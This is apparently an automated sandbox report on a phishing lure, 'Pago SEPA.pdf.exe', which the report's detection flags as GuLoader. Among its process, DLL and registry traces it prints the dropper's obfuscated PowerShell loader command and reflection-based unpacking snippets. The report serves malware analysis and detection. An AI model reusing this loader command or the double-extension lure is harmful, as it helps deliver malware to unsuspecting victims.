    Source: Pago SEPA.pdf.exeReversingLabs: Detection: 47%
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeFile read: C:\Users\user\Desktop\Pago SEPA.pdf.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Pago SEPA.pdf.exe "C:\Users\user\Desktop\Pago SEPA.pdf.exe"
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msvbvm60.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vb6zz.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winsqlite3.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Pago SEPA.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: aqm.Core.pdb source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb" source: powershell.exe, 00000002.00000002.2601004631.00000000084D6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: %]qm.Core.pdb<w> source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000002.00000002.2604236409.000000000BBDF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Kaukasierens $Massekultur $Prologklausulens), (Nonmetrical @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Paabdes = [AppDomain]::CurrentDomain.GetAssembli
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Superaltar)), $Arteriopressorluminas).DefineDynamicModule($Tjenende, $false).DefineType($Pacifies147, $stimevise, [System.MulticastDel
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0484CA78 push eax; mov dword ptr [esp], edx2_2_0484CA8C

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Uses an obfuscated file name to hide its real file extension (double extension)
    Source: Possible double extension: pdf.exeStatic PE information: Pago SEPA.pdf.exe
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
